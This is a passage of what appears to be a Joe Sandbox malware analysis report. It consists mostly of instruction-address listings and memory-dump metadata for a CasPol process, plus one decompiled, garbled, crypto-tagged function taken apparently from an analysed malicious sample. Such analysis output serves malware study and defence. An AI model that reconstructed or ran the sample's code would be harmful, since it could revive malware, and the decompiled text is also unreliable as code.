                                                                                                                                                                                                                                                                                                                            0x00421dee
                                                                                                                                                                                                                                                                                                                            0x00421df4
                                                                                                                                                                                                                                                                                                                            0x00421df5
                                                                                                                                                                                                                                                                                                                            0x00421dfc
                                                                                                                                                                                                                                                                                                                            0x00421e08
                                                                                                                                                                                                                                                                                                                            0x00421e0f
                                                                                                                                                                                                                                                                                                                            0x00421e16
                                                                                                                                                                                                                                                                                                                            0x00421e1c
                                                                                                                                                                                                                                                                                                                            0x00421e23
                                                                                                                                                                                                                                                                                                                            0x00421e25
                                                                                                                                                                                                                                                                                                                            0x00421e2b
                                                                                                                                                                                                                                                                                                                            0x00421e37
                                                                                                                                                                                                                                                                                                                            0x00421e3e
                                                                                                                                                                                                                                                                                                                            0x00421e44
                                                                                                                                                                                                                                                                                                                            0x00421e4a
                                                                                                                                                                                                                                                                                                                            0x00421e4a
                                                                                                                                                                                                                                                                                                                            0x00421da5
                                                                                                                                                                                                                                                                                                                            0x00421c33
                                                                                                                                                                                                                                                                                                                            0x00421c11
                                                                                                                                                                                                                                                                                                                            0x00421bf0
                                                                                                                                                                                                                                                                                                                            0x00421b14
                                                                                                                                                                                                                                                                                                                            0x00421ad7
                                                                                                                                                                                                                                                                                                                            0x0042173d
                                                                                                                                                                                                                                                                                                                            0x0042173d
                                                                                                                                                                                                                                                                                                                            0x00421749
                                                                                                                                                                                                                                                                                                                            0x0042174c
                                                                                                                                                                                                                                                                                                                            0x00421752
                                                                                                                                                                                                                                                                                                                            0x00421754
                                                                                                                                                                                                                                                                                                                            0x0042175a
                                                                                                                                                                                                                                                                                                                            0x00421761
                                                                                                                                                                                                                                                                                                                            0x00421766
                                                                                                                                                                                                                                                                                                                            0x0042176d
                                                                                                                                                                                                                                                                                                                            0x00421773
                                                                                                                                                                                                                                                                                                                            0x00421779
                                                                                                                                                                                                                                                                                                                            0x0042177f
                                                                                                                                                                                                                                                                                                                            0x00421781
                                                                                                                                                                                                                                                                                                                            0x0042178d
                                                                                                                                                                                                                                                                                                                            0x0042178d
                                                                                                                                                                                                                                                                                                                            0x00421798
                                                                                                                                                                                                                                                                                                                            0x004217a5
                                                                                                                                                                                                                                                                                                                            0x004217ab
                                                                                                                                                                                                                                                                                                                            0x004217be
                                                                                                                                                                                                                                                                                                                            0x004217be
                                                                                                                                                                                                                                                                                                                            0x004217be
                                                                                                                                                                                                                                                                                                                            0x004217ca
                                                                                                                                                                                                                                                                                                                            0x004217cc
                                                                                                                                                                                                                                                                                                                            0x004217d2
                                                                                                                                                                                                                                                                                                                            0x004217d8
                                                                                                                                                                                                                                                                                                                            0x004217e4
                                                                                                                                                                                                                                                                                                                            0x004217ea
                                                                                                                                                                                                                                                                                                                            0x004217ea
                                                                                                                                                                                                                                                                                                                            0x004217f0
                                                                                                                                                                                                                                                                                                                            0x004217f7
                                                                                                                                                                                                                                                                                                                            0x004217fd
                                                                                                                                                                                                                                                                                                                            0x00421803
                                                                                                                                                                                                                                                                                                                            0x00421803
                                                                                                                                                                                                                                                                                                                            0x00421803
                                                                                                                                                                                                                                                                                                                            0x00421809
                                                                                                                                                                                                                                                                                                                            0x0042180e
                                                                                                                                                                                                                                                                                                                            0x00421814
                                                                                                                                                                                                                                                                                                                            0x00421819
                                                                                                                                                                                                                                                                                                                            0x00421838
                                                                                                                                                                                                                                                                                                                            0x0042183f
                                                                                                                                                                                                                                                                                                                            0x00421847
                                                                                                                                                                                                                                                                                                                            0x0042184e
                                                                                                                                                                                                                                                                                                                            0x00421858
                                                                                                                                                                                                                                                                                                                            0x0042185e
                                                                                                                                                                                                                                                                                                                            0x0042185e
                                                                                                                                                                                                                                                                                                                            0x0042185e
                                                                                                                                                                                                                                                                                                                            0x0042186a
                                                                                                                                                                                                                                                                                                                            0x0042186f
                                                                                                                                                                                                                                                                                                                            0x00421871
                                                                                                                                                                                                                                                                                                                            0x00421877
                                                                                                                                                                                                                                                                                                                            0x0042187d
                                                                                                                                                                                                                                                                                                                            0x00421883
                                                                                                                                                                                                                                                                                                                            0x00421889
                                                                                                                                                                                                                                                                                                                            0x0042189f
                                                                                                                                                                                                                                                                                                                            0x0042189f
                                                                                                                                                                                                                                                                                                                            0x0042189f
                                                                                                                                                                                                                                                                                                                            0x004218a5
                                                                                                                                                                                                                                                                                                                            0x00421889
                                                                                                                                                                                                                                                                                                                            0x00421877
                                                                                                                                                                                                                                                                                                                            0x0042180e
                                                                                                                                                                                                                                                                                                                            0x004217fd
                                                                                                                                                                                                                                                                                                                            0x004217cc
                                                                                                                                                                                                                                                                                                                            0x0042177f
                                                                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 493df67c17a57220136a3a431873e24b80dd878fa4c9004949634f6035b7a20f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c96f52268bd808e0f86791674295f5cbb5691465914864946b0ced430e9cd7b5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 493df67c17a57220136a3a431873e24b80dd878fa4c9004949634f6035b7a20f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14D1C9729087A1CFDB16CF39E89AB413FB1F796320788029ED1E187692D3362155CF99
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 004222E6 Relevance: .3, Instructions: 251COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                                                                                                            			E004222E6(signed int __eax, signed int __ebx, signed int __ecx, void* __edx, signed int __edi) {
				signed int __esi;
				signed char _t32;
				signed char _t33;
				signed int _t36;
				intOrPtr _t38;
				intOrPtr _t40;
				intOrPtr _t41;
				signed int _t46;
				signed int _t47;
				intOrPtr _t49;
				signed char _t53;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t61;
				void* _t64;
				signed int _t66;
				signed int _t77;

				_t56 = __edi;
				_t32 =  *0x4e2f42a9;
				 *0x4e2f42a9 = __eax &  *0x1a6a54bb;
				asm("rcr dword [0x72c2a333], 0xba");
				 *0x4019ae37 =  *0x4019ae37 + _t32;
				asm("sbb ecx, 0x61458126");
				asm("rol byte [0x672d71c], 0xa8");
				_push(_t57);
				_t58 = _t57 |  *0xb46b12bf;
				 *0x5587e7cd =  *0x5587e7cd ^ _t58;
				_t59 =  *0x95dc9927;
				 *0x95dc9927 = _t58;
				asm("ror byte [0x9f21f7e3], 0xc5");
				asm("sbb ebx, [0x5e16bc2]");
				_t46 = __ecx &  *0x42ccf22e;
				asm("adc ch, [0xd8091610]");
				_t36 = (__ebx ^  *0xafdd5ec6) & 0x000000b4;
				asm("rol byte [0x4d46edb6], 0xb0");
				 *0xa5036418 =  *0xa5036418 << 0xc;
				 *0x886f14de =  *0x886f14de & _t36;
				 *0x30195e35 =  *0x30195e35 + _t46;
				_t47 = _t46 ^  *0x44e5a5fb;
				 *0xf03275c5 =  *0xf03275c5 >> 0x30;
				 *0xb6a1c124 =  *0xb6a1c124 + _t47;
				 *0x2117df34 =  *0x2117df34 >> 0x67;
				_t33 = _t32 &  *0x11f772c6;
				asm("sbb edx, [0x28789a93]");
				_t61 =  *0x95d80d60 * 0x3832;
				asm("adc esi, [0x49098393]");
				_t64 = _t46;
				_push(_t36 +  *0x7231e7ec);
				asm("scasd");
				asm("adc [0x74109b1e], esi");
				asm("adc cl, 0x88");
				_t53 = __edx + 0xe8;
				_t49 = _t47 + 0x18 - 1;
				_t66 = _t64 +  *0x958a921d + 1;
				if(_t33 >  *0xb94b8fe2) {
					__edx =  *0xda15b97e * 0x743d;
					asm("adc [0xdb625def], esp");
					asm("scasd");
					 *0x3e15ae37 =  *0x3e15ae37 ^ __esp;
					asm("rcr byte [0x935c63], 0xc6");
					 *0x96e8521b =  *0x96e8521b >> 0x8b;
					if(__ebx <=  *0xd86271cb) {
						goto L1;
					}
					asm("rcl dword [0xdf9ae876], 0x44");
					__ah = __ah + 0x86;
					__esp =  *0x1174996a * 0x6753;
					__ebx = __ebx + 1;
					asm("rcr dword [0xf704eec7], 0x33");
					_t17 = __eax;
					__eax =  *0x8255498d;
					 *0x8255498d = _t17;
					asm("rcr byte [0x8c22b0f9], 0x82");
					__edi = __edi - 1;
					asm("scasd");
					_push( *0xa7adcc11);
					__cl = __cl ^  *0x6cccacd0;
					asm("rol byte [0xaff92824], 0x15");
					__esi = __esi + 0x47814919;
					 *0xfd663625 = __edi;
					asm("sbb [0xee8483d3], edi");
					 *0x26f2b062 =  *0x26f2b062 & __ecx;
					__ebp = __edi;
					asm("rcr dword [0xe395dc95], 0x9b");
					 *0x71e011f7 =  *0x71e011f7 + __ecx;
					asm("ror byte [0x2a998712], 0xae");
					__esi = __esi |  *0xf731b9be;
					asm("sbb [0x6260ce9a], eax");
					_pop(__esi);
					__edi = __edi - 1;
					asm("scasd");
					__ebx = __ebx + 0x144e0021;
					 *0x44724e8a =  *0x44724e8a << 0x4e;
					L1();
					__eax =  *0x8255498d -  *0xa709bce8;
					 *0x483788f0 = __ecx;
					__edx = __edx - 1;
					if(__edx >= 0) {
						goto L1;
					}
					 *0x54418336 =  *0x54418336 ^ __ebp;
					__ebp =  *0x3548fb69 * 0x115e;
					asm("adc esp, [0x6a62a965]");
					_push(__esi);
					__ebp =  *0x2da9ee23;
					 *0x2da9ee23 =  *0x3548fb69 * 0x115e;
					__ecx = __ecx |  *0xd0485607;
					 *0xaf4f5227 =  *0xaf4f5227 >> 0xf4;
					_push( *0xace9fa0d);
					if( *0xaf4f5227 < 0) {
						goto L1;
					}
					__ebp = __ebp + 0xb33344ed;
					 *0x9153528 =  *0x9153528 ^ __cl;
					__cl =  *0x8d190d02;
					__ecx = __ecx - 1;
					__eax = __eax +  *0x4cc1f6f8;
					__ebx = __ebx &  *0x1b9edc17;
					__al = __al & 0x00000024;
					__edi =  *0xd045dbed;
					 *0x161174e2 =  *0x161174e2 << 0x7f;
					_push( *0x75615292);
					__al = __al | 0x000000d2;
					__edi =  *0xd045dbed ^  *0x5af4519f;
					_pop(__esi);
					__edi = ( *0xd045dbed ^  *0x5af4519f) - 1;
					asm("scasd");
					__ebx = 0xcf33c11d;
					 *0xfd19fffe =  *0xfd19fffe ^ 0xcf33c11d;
					asm("rcl dword [0x3ce3589d], 0x56");
					if( *0xfd19fffe >= 0) {
						goto L1;
					}
					__ecx = __ecx |  *0xad74873;
					asm("rol dword [0xf95bedc1], 0xe6");
					__edi = __edi - 1;
					asm("scasb");
					__esi = __esi - 0xa1b38a15;
					__edi = __edi &  *0xb70b8603;
					 *0xdedc1cbd =  *0xdedc1cbd >> 0x7a;
					_push( *0x4ee680bd);
					asm("adc eax, [0xb0222d15]");
					 *0xd2197499 =  *0xd2197499 >> 0x1e;
					asm("rcr byte [0x7b1ef32a], 0x4c");
					asm("sbb [0xa9dac10c], ch");
					if(__edi < 0) {
						goto L1;
					}
					_t27 = __edi;
					__edi =  *0x24ce0f6e;
					 *0x24ce0f6e = _t27;
					 *0x74068024 =  *0x74068024 << 0x82;
					_pop(__ecx);
					 *0x15f772dc =  *0x15f772dc |  *0x3e5e5439;
					__edx = __edx - 1;
					__bl = __bl |  *0x78021663;
					__ah = __ah |  *0x90bc2080;
					__dl = __dl - 0x80;
					__ecx = __ecx |  *0x1c19326e;
					__eax =  *0xd74996a * 0x26d3;
					 *0x5c356fe1 =  *0x5c356fe1 << 6;
					 *0xfa87d725 =  *0xfa87d725 >> 0x84;
					asm("lodsd");
					__esi = __esi ^ 0x0c1d3521;
					_push(__edx);
					 *0x1b1cf05 =  *0x1b1cf05 ^ __esi;
					 *0x48b2f7b3 = __bl;
					asm("sbb ecx, [0xb05bf927]");
					asm("sbb esp, [0x5803ae15]");
					__ebp = ( *0x15f772dc |  *0x3e5e5439) - 0xdb51552f;
					asm("scasd");
					__ecx = __ecx | 0xaf15ae37;
					 *0xae3cad18 =  *0xae3cad18 << 0x64;
					__bh = __bh -  *0x6cc5ec14;
					asm("ror byte [0xbf3fefe6], 0x71");
					__esp = __esp ^ 0x081dab2e;
					asm("sbb [0x74b0d9a8], ch");
					asm("rcr dword [0x66b62d11], 0x6");
					asm("ror dword [0x97bfdebd], 0xc1");
					if(__esp != 0) {
						goto L1;
					}
					__edi = 0x5ce60b7a;
					asm("scasd");
					__ecx = __ecx + 1;
					_t28 = __al;
					__al =  *0xaf4f8c00;
					 *0xaf4f8c00 = _t28;
					asm("adc ebx, [0x408c4815]");
					asm("rcl byte [0x94f100c9], 0x5d");
					_push(0x5ce60b7a);
					_push( *0x6cc8223);
					__esp =  *0xbd201d6a * 0x1174;
					__ebx =  *0x767cb96b * 0x64ce;
					__eax = 0xc70da15;
					_pop(__esi);
					return 0xc70da15;
				}
				L1:
				 *0x43524309 =  *0x43524309 & _t66;
				asm("sbb dh, 0xe7");
				asm("sbb edx, 0x82220d1b");
				if(( *0xe943ed04 & _t53) < 0) {
					_t38 =  *0x5f4f9371;
					asm("rcl byte [0x1d77d2e4], 0xcb");
					_push(0xc3526c8);
					 *0xf2718031 =  *0xf2718031 << 0x6b;
					_push( *0x768df2d5);
					_t66 = _t66 +  *0xfd6fb6f8;
					asm("adc [0xf0f70d08], cl");
					if(_t66 >= 0) {
						asm("sbb ebp, 0xaf302878");
						_t40 =  *0xd555c1d;
						 *0xd555c1d = _t38 + 0x26f805f4;
						asm("rol dword [0xd4fd1f0d], 0x47");
						_t59 = _t59 ^  *0x8c671335;
						_t56 = _t56 +  *0x1e3a4d21;
						_t8 = _t61;
						_t61 =  *0x9702ba6e;
						 *0x9702ba6e = _t8;
						asm("cmpsw");
						if( *0x2a496f10 >= _t53) {
							_t41 = _t40 - 0xe9067f78;
							 *0xe9afa29f =  *0xe9afa29f - _t33;
							_t49 = _t49 -  *0xa6b6bd0a;
							_t56 = _t56 & 0x151a3439;
							_t77 = _t56;
							asm("rcr byte [0x904410a], 0x15");
							asm("adc edx, [0x6ec2c2b9]");
							if(_t77 >= 0) {
								_t9 = _t53;
								_t53 =  *0xcc44272;
								 *0xcc44272 = _t9;
								_t56 = 0xc568051b;
								if(_t77 == 0) {
									_t33 = _t33 - 0xa553675;
									 *0xd2b9e192 = _t41;
									asm("rol dword [0xdf2fc60f], 0x91");
									_t61 = _t61 &  *0xf809aa31;
									 *0x24d95062 =  *0x24d95062 >> 0xd4;
									 *0x12a951cc =  *0x12a951cc << 0xdb;
									_t49 =  *0xde75bbeb;
									_t15 = (_t53 &  *0xd03e682) - 0xe2;
									_t53 =  *0xaea0fc25;
									 *0xaea0fc25 = _t15;
									asm("sbb eax, 0x18d67083");
									asm("cmpsw");
									_t59 = 0x047197fa &  *0x5d967e2b;
									if(0x47197fa != 0) {
										asm("sbb ecx, [0x965cf74]");
										 *0x16c6af0 =  *0x16c6af0 + _t61;
										if( *0x16c6af0 > 0 &&  *0xd215827e * 0x46ab < 0) {
											_t16 = _t53;
											_t53 =  *0x9d4a1571;
											 *0x9d4a1571 = _t16;
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}






















                                                                                                                                                                                                                                                                                                                            0x004222e6
                                                                                                                                                                                                                                                                                                                            0x004222ec
                                                                                                                                                                                                                                                                                                                            0x004222ec
                                                                                                                                                                                                                                                                                                                            0x004222f8
                                                                                                                                                                                                                                                                                                                            0x00422305
                                                                                                                                                                                                                                                                                                                            0x0042230c
                                                                                                                                                                                                                                                                                                                            0x00422312
                                                                                                                                                                                                                                                                                                                            0x00422319
                                                                                                                                                                                                                                                                                                                            0x0042231a
                                                                                                                                                                                                                                                                                                                            0x00422320
                                                                                                                                                                                                                                                                                                                            0x00422326
                                                                                                                                                                                                                                                                                                                            0x00422326
                                                                                                                                                                                                                                                                                                                            0x0042232c
                                                                                                                                                                                                                                                                                                                            0x00422333
                                                                                                                                                                                                                                                                                                                            0x00422339
                                                                                                                                                                                                                                                                                                                            0x0042233f
                                                                                                                                                                                                                                                                                                                            0x00422346
                                                                                                                                                                                                                                                                                                                            0x00422349
                                                                                                                                                                                                                                                                                                                            0x00422350
                                                                                                                                                                                                                                                                                                                            0x00422357
                                                                                                                                                                                                                                                                                                                            0x00422363
                                                                                                                                                                                                                                                                                                                            0x00422369
                                                                                                                                                                                                                                                                                                                            0x0042236f
                                                                                                                                                                                                                                                                                                                            0x0042237f
                                                                                                                                                                                                                                                                                                                            0x00422385
                                                                                                                                                                                                                                                                                                                            0x0042238c
                                                                                                                                                                                                                                                                                                                            0x00422392
                                                                                                                                                                                                                                                                                                                            0x00422398
                                                                                                                                                                                                                                                                                                                            0x004223a2
                                                                                                                                                                                                                                                                                                                            0x004223a8
                                                                                                                                                                                                                                                                                                                            0x004223a9
                                                                                                                                                                                                                                                                                                                            0x004223aa
                                                                                                                                                                                                                                                                                                                            0x004223b1
                                                                                                                                                                                                                                                                                                                            0x004223b7
                                                                                                                                                                                                                                                                                                                            0x004223ba
                                                                                                                                                                                                                                                                                                                            0x004223be
                                                                                                                                                                                                                                                                                                                            0x004223c5
                                                                                                                                                                                                                                                                                                                            0x004223c6
                                                                                                                                                                                                                                                                                                                            0x004223cc
                                                                                                                                                                                                                                                                                                                            0x004223d6
                                                                                                                                                                                                                                                                                                                            0x004223dc
                                                                                                                                                                                                                                                                                                                            0x004223dd
                                                                                                                                                                                                                                                                                                                            0x004223e3
                                                                                                                                                                                                                                                                                                                            0x004223f0
                                                                                                                                                                                                                                                                                                                            0x004223f7
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x004223fd
                                                                                                                                                                                                                                                                                                                            0x00422404
                                                                                                                                                                                                                                                                                                                            0x00422407
                                                                                                                                                                                                                                                                                                                            0x00422411
                                                                                                                                                                                                                                                                                                                            0x00422412
                                                                                                                                                                                                                                                                                                                            0x00422419
                                                                                                                                                                                                                                                                                                                            0x00422419
                                                                                                                                                                                                                                                                                                                            0x00422419
                                                                                                                                                                                                                                                                                                                            0x0042241f
                                                                                                                                                                                                                                                                                                                            0x00422426
                                                                                                                                                                                                                                                                                                                            0x00422427
                                                                                                                                                                                                                                                                                                                            0x00422428
                                                                                                                                                                                                                                                                                                                            0x0042242e
                                                                                                                                                                                                                                                                                                                            0x00422434
                                                                                                                                                                                                                                                                                                                            0x00422444
                                                                                                                                                                                                                                                                                                                            0x0042244a
                                                                                                                                                                                                                                                                                                                            0x00422450
                                                                                                                                                                                                                                                                                                                            0x00422456
                                                                                                                                                                                                                                                                                                                            0x00422462
                                                                                                                                                                                                                                                                                                                            0x00422463
                                                                                                                                                                                                                                                                                                                            0x0042246a
                                                                                                                                                                                                                                                                                                                            0x00422470
                                                                                                                                                                                                                                                                                                                            0x00422477
                                                                                                                                                                                                                                                                                                                            0x0042247d
                                                                                                                                                                                                                                                                                                                            0x00422483
                                                                                                                                                                                                                                                                                                                            0x00422484
                                                                                                                                                                                                                                                                                                                            0x00422485
                                                                                                                                                                                                                                                                                                                            0x00422486
                                                                                                                                                                                                                                                                                                                            0x0042248c
                                                                                                                                                                                                                                                                                                                            0x00422493
                                                                                                                                                                                                                                                                                                                            0x00422498
                                                                                                                                                                                                                                                                                                                            0x0042249e
                                                                                                                                                                                                                                                                                                                            0x004224a4
                                                                                                                                                                                                                                                                                                                            0x004224a5
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x004224b1
                                                                                                                                                                                                                                                                                                                            0x004224bd
                                                                                                                                                                                                                                                                                                                            0x004224c7
                                                                                                                                                                                                                                                                                                                            0x004224cd
                                                                                                                                                                                                                                                                                                                            0x004224ce
                                                                                                                                                                                                                                                                                                                            0x004224ce
                                                                                                                                                                                                                                                                                                                            0x004224d4
                                                                                                                                                                                                                                                                                                                            0x004224da
                                                                                                                                                                                                                                                                                                                            0x004224e1
                                                                                                                                                                                                                                                                                                                            0x004224e7
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x004224f3
                                                                                                                                                                                                                                                                                                                            0x004224f9
                                                                                                                                                                                                                                                                                                                            0x004224ff
                                                                                                                                                                                                                                                                                                                            0x00422505
                                                                                                                                                                                                                                                                                                                            0x00422506
                                                                                                                                                                                                                                                                                                                            0x0042250c
                                                                                                                                                                                                                                                                                                                            0x00422512
                                                                                                                                                                                                                                                                                                                            0x00422514
                                                                                                                                                                                                                                                                                                                            0x0042251a
                                                                                                                                                                                                                                                                                                                            0x00422521
                                                                                                                                                                                                                                                                                                                            0x00422527
                                                                                                                                                                                                                                                                                                                            0x00422529
                                                                                                                                                                                                                                                                                                                            0x00422535
                                                                                                                                                                                                                                                                                                                            0x00422536
                                                                                                                                                                                                                                                                                                                            0x00422537
                                                                                                                                                                                                                                                                                                                            0x00422538
                                                                                                                                                                                                                                                                                                                            0x0042253d
                                                                                                                                                                                                                                                                                                                            0x00422543
                                                                                                                                                                                                                                                                                                                            0x0042254a
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00422550
                                                                                                                                                                                                                                                                                                                            0x00422556
                                                                                                                                                                                                                                                                                                                            0x0042255d
                                                                                                                                                                                                                                                                                                                            0x0042256a
                                                                                                                                                                                                                                                                                                                            0x0042256b
                                                                                                                                                                                                                                                                                                                            0x00422571
                                                                                                                                                                                                                                                                                                                            0x00422577
                                                                                                                                                                                                                                                                                                                            0x0042257e
                                                                                                                                                                                                                                                                                                                            0x00422584
                                                                                                                                                                                                                                                                                                                            0x0042258a
                                                                                                                                                                                                                                                                                                                            0x00422591
                                                                                                                                                                                                                                                                                                                            0x00422598
                                                                                                                                                                                                                                                                                                                            0x0042259e
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x004225aa
                                                                                                                                                                                                                                                                                                                            0x004225aa
                                                                                                                                                                                                                                                                                                                            0x004225aa
                                                                                                                                                                                                                                                                                                                            0x004225b0
                                                                                                                                                                                                                                                                                                                            0x004225b7
                                                                                                                                                                                                                                                                                                                            0x004225be
                                                                                                                                                                                                                                                                                                                            0x004225c4
                                                                                                                                                                                                                                                                                                                            0x004225c5
                                                                                                                                                                                                                                                                                                                            0x004225cb
                                                                                                                                                                                                                                                                                                                            0x004225d1
                                                                                                                                                                                                                                                                                                                            0x004225d4
                                                                                                                                                                                                                                                                                                                            0x004225da
                                                                                                                                                                                                                                                                                                                            0x004225e4
                                                                                                                                                                                                                                                                                                                            0x004225eb
                                                                                                                                                                                                                                                                                                                            0x004225f2
                                                                                                                                                                                                                                                                                                                            0x004225f3
                                                                                                                                                                                                                                                                                                                            0x004225f9
                                                                                                                                                                                                                                                                                                                            0x00422600
                                                                                                                                                                                                                                                                                                                            0x00422606
                                                                                                                                                                                                                                                                                                                            0x0042260c
                                                                                                                                                                                                                                                                                                                            0x00422612
                                                                                                                                                                                                                                                                                                                            0x00422618
                                                                                                                                                                                                                                                                                                                            0x0042261e
                                                                                                                                                                                                                                                                                                                            0x0042261f
                                                                                                                                                                                                                                                                                                                            0x00422625
                                                                                                                                                                                                                                                                                                                            0x0042262c
                                                                                                                                                                                                                                                                                                                            0x00422632
                                                                                                                                                                                                                                                                                                                            0x00422639
                                                                                                                                                                                                                                                                                                                            0x0042263f
                                                                                                                                                                                                                                                                                                                            0x00422645
                                                                                                                                                                                                                                                                                                                            0x0042264c
                                                                                                                                                                                                                                                                                                                            0x00422653
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00422659
                                                                                                                                                                                                                                                                                                                            0x0042265e
                                                                                                                                                                                                                                                                                                                            0x0042265f
                                                                                                                                                                                                                                                                                                                            0x00422660
                                                                                                                                                                                                                                                                                                                            0x00422660
                                                                                                                                                                                                                                                                                                                            0x00422660
                                                                                                                                                                                                                                                                                                                            0x00422666
                                                                                                                                                                                                                                                                                                                            0x0042266c
                                                                                                                                                                                                                                                                                                                            0x00422673
                                                                                                                                                                                                                                                                                                                            0x00422674
                                                                                                                                                                                                                                                                                                                            0x00422680
                                                                                                                                                                                                                                                                                                                            0x0042268a
                                                                                                                                                                                                                                                                                                                            0x00422694
                                                                                                                                                                                                                                                                                                                            0x0042269a
                                                                                                                                                                                                                                                                                                                            0x0042269b
                                                                                                                                                                                                                                                                                                                            0x0042269b
                                                                                                                                                                                                                                                                                                                            0x0042173d
                                                                                                                                                                                                                                                                                                                            0x0042173d
                                                                                                                                                                                                                                                                                                                            0x00421749
                                                                                                                                                                                                                                                                                                                            0x0042174c
                                                                                                                                                                                                                                                                                                                            0x00421752
                                                                                                                                                                                                                                                                                                                            0x00421754
                                                                                                                                                                                                                                                                                                                            0x0042175a
                                                                                                                                                                                                                                                                                                                            0x00421761
                                                                                                                                                                                                                                                                                                                            0x00421766
                                                                                                                                                                                                                                                                                                                            0x0042176d
                                                                                                                                                                                                                                                                                                                            0x00421773
                                                                                                                                                                                                                                                                                                                            0x00421779
                                                                                                                                                                                                                                                                                                                            0x0042177f
                                                                                                                                                                                                                                                                                                                            0x00421781
                                                                                                                                                                                                                                                                                                                            0x0042178d
                                                                                                                                                                                                                                                                                                                            0x0042178d
                                                                                                                                                                                                                                                                                                                            0x00421798
                                                                                                                                                                                                                                                                                                                            0x004217a5
                                                                                                                                                                                                                                                                                                                            0x004217ab
                                                                                                                                                                                                                                                                                                                            0x004217be
                                                                                                                                                                                                                                                                                                                            0x004217be
                                                                                                                                                                                                                                                                                                                            0x004217be
                                                                                                                                                                                                                                                                                                                            0x004217ca
                                                                                                                                                                                                                                                                                                                            0x004217cc
                                                                                                                                                                                                                                                                                                                            0x004217d2
                                                                                                                                                                                                                                                                                                                            0x004217d8
                                                                                                                                                                                                                                                                                                                            0x004217e4
                                                                                                                                                                                                                                                                                                                            0x004217ea
                                                                                                                                                                                                                                                                                                                            0x004217ea
                                                                                                                                                                                                                                                                                                                            0x004217f0
                                                                                                                                                                                                                                                                                                                            0x004217f7
                                                                                                                                                                                                                                                                                                                            0x004217fd
                                                                                                                                                                                                                                                                                                                            0x00421803
                                                                                                                                                                                                                                                                                                                            0x00421803
                                                                                                                                                                                                                                                                                                                            0x00421803
                                                                                                                                                                                                                                                                                                                            0x00421809
                                                                                                                                                                                                                                                                                                                            0x0042180e
                                                                                                                                                                                                                                                                                                                            0x00421814
                                                                                                                                                                                                                                                                                                                            0x00421819
                                                                                                                                                                                                                                                                                                                            0x00421838
                                                                                                                                                                                                                                                                                                                            0x0042183f
                                                                                                                                                                                                                                                                                                                            0x00421847
                                                                                                                                                                                                                                                                                                                            0x0042184e
                                                                                                                                                                                                                                                                                                                            0x00421858
                                                                                                                                                                                                                                                                                                                            0x0042185e
                                                                                                                                                                                                                                                                                                                            0x0042185e
                                                                                                                                                                                                                                                                                                                            0x0042185e
                                                                                                                                                                                                                                                                                                                            0x0042186a
                                                                                                                                                                                                                                                                                                                            0x0042186f
                                                                                                                                                                                                                                                                                                                            0x00421871
                                                                                                                                                                                                                                                                                                                            0x00421877
                                                                                                                                                                                                                                                                                                                            0x0042187d
                                                                                                                                                                                                                                                                                                                            0x00421883
                                                                                                                                                                                                                                                                                                                            0x00421889
                                                                                                                                                                                                                                                                                                                            0x0042189f
                                                                                                                                                                                                                                                                                                                            0x0042189f
                                                                                                                                                                                                                                                                                                                            0x0042189f
                                                                                                                                                                                                                                                                                                                            0x004218a5
                                                                                                                                                                                                                                                                                                                            0x00421889
                                                                                                                                                                                                                                                                                                                            0x00421877
                                                                                                                                                                                                                                                                                                                            0x0042180e
                                                                                                                                                                                                                                                                                                                            0x004217fd
                                                                                                                                                                                                                                                                                                                            0x004217cc
                                                                                                                                                                                                                                                                                                                            0x0042177f
                                                                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 020783bb0c6e94a2f0c879c0faef6be5a4f7e7562fff37f8ea5d2a0a7134f71c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b1ab45619040a89c254516e21e0c5809a2fe6c28895202581e121ed34705c7c5
